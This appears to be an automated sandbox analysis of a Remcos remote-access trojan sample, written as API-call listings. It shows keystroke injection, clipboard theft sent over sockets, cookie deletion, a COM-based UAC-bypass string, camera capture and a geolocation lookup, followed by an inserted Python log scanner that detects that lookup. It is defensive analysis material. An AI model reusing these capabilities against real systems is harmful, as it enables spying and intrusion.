• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 00449A40
• __alloca_probe_16.LIBCMT ref: 00449AD7
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
• __freea.LIBCMT ref: 00449B47
  • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
• __freea.LIBCMT ref: 00449B50
• __freea.LIBCMT ref: 00449B75
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
• String ID:
• API String ID: 2597970681-0
APIs
• SendInput.USER32 ref: 00418B18
• SendInput.USER32(00000001,?,0000001C), ref: 00418B40
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
• SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
• SendInput.USER32(00000001,?,0000001C), ref: 00418C0F
  • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: InputSend$Virtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1167301434-0
                                                                                                                                                                                              • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                                                                              • Instruction ID: 9e9d03405de643faf883966fb0167173931b0bf8c68e8067c58721a0feba7ae1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 10318071248349AAE210DF65D841FDBFBECAFD9B44F04080FB98457191DBA4998C876B
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • OpenClipboard.USER32 ref: 00415A46
                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 00415A54
                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                                                                                              • OpenClipboard.USER32 ref: 00415A61
                                                                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00415A89
                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2172192267-0
                                                                                                                                                                                              • Opcode ID: 188954088982c27bf1798ee8bc1fdab4a0b1341d415165718f6a40a7b43e1a5c
                                                                                                                                                                                              • Instruction ID: 21d753e14671b68e74bb0dc0c2a05280281c3050cfaacb3e005a94eaf945824a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 188954088982c27bf1798ee8bc1fdab4a0b1341d415165718f6a40a7b43e1a5c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D0152312083009FC314BB75EC5AAEE77A5AFC0752F41457EFD06861A2DF38C845D65A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                              • String ID: a/p$am/pm$fD
                                                                                                                                                                                              • API String ID: 3509577899-1143445303
                                                                                                                                                                                              • Opcode ID: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                                                                                                                                                              • Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
                                                                                                                                                                                              • Opcode Fuzzy Hash: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                              • Opcode ID: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                                                                                                                                                              • Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                                                                                                                                                              • _free.LIBCMT ref: 00444096
                                                                                                                                                                                              • _free.LIBCMT ref: 004440AD
                                                                                                                                                                                              • _free.LIBCMT ref: 004440CC
                                                                                                                                                                                              • _free.LIBCMT ref: 004440E7
                                                                                                                                                                                              • _free.LIBCMT ref: 004440FE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$AllocHeap
                                                                                                                                                                                              • String ID: Z7D
                                                                                                                                                                                              • API String ID: 1835388192-2145146825
                                                                                                                                                                                              • Opcode ID: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                                                                                                                                                              • Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
                                                                                                                                                                                              • Opcode Fuzzy Hash: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A115
                                                                                                                                                                                              • __fassign.LIBCMT ref: 0044A190
                                                                                                                                                                                              • __fassign.LIBCMT ref: 0044A1AB
                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1D1
                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                              • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                              • Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
                                                                                                                                                                                              • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                              • Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                                                                                                • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,00475B90,00475C10,?,0040179E,00475C10), ref: 00433534
                                                                                                                                                                                                • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475C10), ref: 00433571
                                                                                                                                                                                              • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                                                                                                • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                                                                                                • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475C10,?,004017C1,00475C10,00000000), ref: 004334E9
                                                                                                                                                                                                • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475C10,00000000), ref: 0043351C
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
• API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
• String ID: T=G$>G$>G
• API String ID: 1596592924-1617985637
• Opcode ID: 88022268fe3ca53b7ee126a34617c6b967d0ef3f346763fa63774eaa4140af22
• Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
• Opcode Fuzzy Hash: 88022268fe3ca53b7ee126a34617c6b967d0ef3f346763fa63774eaa4140af22
• Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E
APIs
• RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
  • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
  • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CloseEnumInfoOpenQuerysend
• String ID: TUFTUF$>G$DG$DG
• API String ID: 3114080316-344394840
• Opcode ID: de4befe685273e7bf067e3fe47780df676ebf89a32a955f1e6b39ea8039125ff
• Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
• Opcode Fuzzy Hash: de4befe685273e7bf067e3fe47780df676ebf89a32a955f1e6b39ea8039125ff
• Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
APIs
• _ValidateLocalCookies.LIBCMT ref: 00437ABB
• ___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
• _ValidateLocalCookies.LIBCMT ref: 00437B51
• __IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
• _ValidateLocalCookies.LIBCMT ref: 00437BD1
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
• Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
• Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
• Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95
APIs
  • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
  • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
  • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
• ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
• PathFileExistsA.SHLWAPI(?), ref: 0040B779
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
• String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
• API String ID: 1133728706-4073444585
• Opcode ID: bbd59c4342a3f048f0a7499dd9cd327f959f912607a0dc40202ba9ee31ab275b
• Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
• Opcode Fuzzy Hash: bbd59c4342a3f048f0a7499dd9cd327f959f912607a0dc40202ba9ee31ab275b
• Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
• Instruction ID: c456bd3af877b6cafd4b53f13a87e342c7fa5de46f767ee01c057a6e18c8cad8
• Opcode Fuzzy Hash: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
• Instruction Fuzzy Hash: 401102B1508615FBDB206F729C4593B7BACEF82772B20016FFC05C6242DA3CC801D669
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
• int.LIBCPMT ref: 0040FC0F
  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
• std::_Facet_Register.LIBCPMT ref: 0040FC4B
• std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID: p[G
• API String ID: 2536120697-440918510
• Opcode ID: 34d2c97419ff9ea43b4d99934c17e21ff42c81eb248cc24d2bbad1ad966fea40
• Instruction ID: 57388c14a05e53b5f50c1e79e3c37d993a50775a9f2b0ccff9e8b1bf96635e0f
• Opcode Fuzzy Hash: 34d2c97419ff9ea43b4d99934c17e21ff42c81eb248cc24d2bbad1ad966fea40
• Instruction Fuzzy Hash: BD110232904519A7CB10FBA5D8469EEB7289E84358F20007BF805B72C1EB7CAF45C78D
APIs
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
• InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
• InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
• InternetCloseHandle.WININET(00000000), ref: 0041A5C3
• InternetCloseHandle.WININET(00000000), ref: 0041A5C6
Strings
• http://geoplugin.net/json.gp, xrefs: 0041A55E
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandleOpen$FileRead
• String ID: http://geoplugin.net/json.gp
• API String ID: 3121278467-91888290
• Opcode ID: 277b3accc4d7b5025d2c7427303433e7431fc8b467990071231497c86fa6234c
• Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
• Opcode Fuzzy Hash: 277b3accc4d7b5025d2c7427303433e7431fc8b467990071231497c86fa6234c
• Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA
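The function above is the sample's victim-geolocation lookup: a plain WinINet GET of http://geoplugin.net/json.gp (InternetOpenW with a NULL agent string, INTERNET_OPEN_TYPE_DIRECT, then InternetOpenUrlW with INTERNET_FLAG_RELOAD and a single InternetReadFile). The URL is a usable network indicator, but geoplugin.net is a legitimate public service, so a detection should carry enough context to triage. The following is an added example written for this page, not code from the report or from Joe Sandbox: it scans a constructed, simplified tab-separated proxy log (timestamp, source IP, method, host, URI, user agent; this format and the log lines are made up for the example) and flags requests for the exact host and path. The scoring is an assumption: a request with no browser-like User-Agent is scored higher, because the NULL lpszAgent passed to InternetOpenW above means the sample does not announce itself as a browser.

```python
"""Flag HTTP requests to the geoplugin.net endpoint the analysed sample fetches.

Added example for this page; not part of the sandbox report. The log format is a
constructed, simplified proxy log (one request per line, tab-separated):
    timestamp  src_ip  method  host  uri  user_agent
with an empty user agent written as "-".
"""
from dataclasses import dataclass
from typing import List
from urllib.parse import urlsplit

# URL string present in the sample (InternetOpenUrlW argument above).
GEOPLUGIN_URL = "http://geoplugin.net/json.gp"

# Constructed sample log lines; not captured traffic.
SAMPLE_LOG = """\
2025-01-02T10:00:01Z\t10.0.0.5\tGET\tgeoplugin.net\t/json.gp\t-
2025-01-02T10:00:02Z\t10.0.0.5\tGET\twww.example.com\t/\tMozilla/5.0
2025-01-02T10:00:03Z\t10.0.0.9\tGET\tgeoplugin.net\t/json.gp?ip=1.2.3.4\tMozilla/5.0 (Windows NT 10.0) Chrome/120.0
2025-01-02T10:00:04Z\t10.0.0.9\tGET\tgeoplugin.net\t/javascript.gp\tMozilla/5.0
"""


@dataclass
class Hit:
    timestamp: str
    src_ip: str
    user_agent: str
    # Assumed heuristic score: 2 = non-browser client, review first; 1 = browser UA, triage.
    score: int


def _ioc_host_and_path():
    parts = urlsplit(GEOPLUGIN_URL)
    return parts.hostname, parts.path


def _looks_like_browser(ua: str) -> bool:
    # Assumption for the example: real browsers send a "Mozilla/..." agent string.
    return ua.startswith("Mozilla/")


def scan_log(text: str) -> List[Hit]:
    """Return one Hit per request that matches the geoplugin.net/json.gp indicator."""
    ioc_host, ioc_path = _ioc_host_and_path()
    hits: List[Hit] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, _method, host, uri, ua = line.split("\t", 5)
        # Match host case-insensitively and compare only the path, ignoring any query string.
        if host.lower() != ioc_host or uri.split("?", 1)[0] != ioc_path:
            continue
        ua = "" if ua == "-" else ua
        score = 1 if _looks_like_browser(ua) else 2
        hits.append(Hit(timestamp=ts, src_ip=src, user_agent=ua, score=score))
    # Highest-priority hits first.
    hits.sort(key=lambda h: (-h.score, h.timestamp))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"score={hit.score} {hit.timestamp} {hit.src_ip} ua={hit.user_agent!r}")
```

In practice the same match belongs in the proxy or IDS layer (the report's own Suricata alerts cover this traffic); the value of the script is the triage context: a source host that fetched json.gp with no browser agent is a stronger candidate for the Remcos process than one where a browser page happened to load the service.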
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B
                                                                                                                                                                                              • _free.LIBCMT ref: 0044FD39
                                                                                                                                                                                                • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                              • _free.LIBCMT ref: 0044FD44
                                                                                                                                                                                              • _free.LIBCMT ref: 0044FD4F
                                                                                                                                                                                              • _free.LIBCMT ref: 0044FDA3
                                                                                                                                                                                              • _free.LIBCMT ref: 0044FDAE
                                                                                                                                                                                              • _free.LIBCMT ref: 0044FDB9
                                                                                                                                                                                              • _free.LIBCMT ref: 0044FDC4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\4XYAW8PbZH.exe), ref: 00406835
                                                                                                                                                                                                • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                                                                                                                • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 0040688E
                                                                                                                                                                                              • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\4XYAW8PbZH.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                                                                              • API String ID: 3851391207-2454154425
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                                                                                                              • int.LIBCPMT ref: 0040FEF2
                                                                                                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                                                                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                              • String ID: h]G
                                                                                                                                                                                              • API String ID: 2536120697-1579725984
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                                                                                                              • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                                                                                                              • UserProfile, xrefs: 0040B2B4
                                                                                                                                                                                              • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                                                                                                              • API ID: DeleteErrorFileLast
                                                                                                                                                                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                                              • API String ID: 2018770650-304995407
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • AllocConsole.KERNEL32(00474358), ref: 0041BEC9
                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
                                                                                                                                                                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07
                                                                                                                                                                                              • API ID: Console$AllocOutputShowWindow
                                                                                                                                                                                              • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                                                                                                              • API String ID: 2425139147-2527699604
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: (CG$C:\Users\user\Desktop\4XYAW8PbZH.exe$BG
                                                                                                                                                                                              • API String ID: 0-799540987
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __allrem.LIBCMT ref: 00439799
                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
                                                                                                                                                                                              • __allrem.LIBCMT ref: 004397CC
                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
                                                                                                                                                                                              • __allrem.LIBCMT ref: 00439801
                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F
                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1992179935-0
                                                                                                                                                                                              • API ID: __cftoe
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4189289331-0
APIs
• Sleep.KERNEL32(00000000), ref: 00403E8A
  • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: H_prologSleep
• String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
• API String ID: 3469354165-462540288
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77
Memory Dump Source
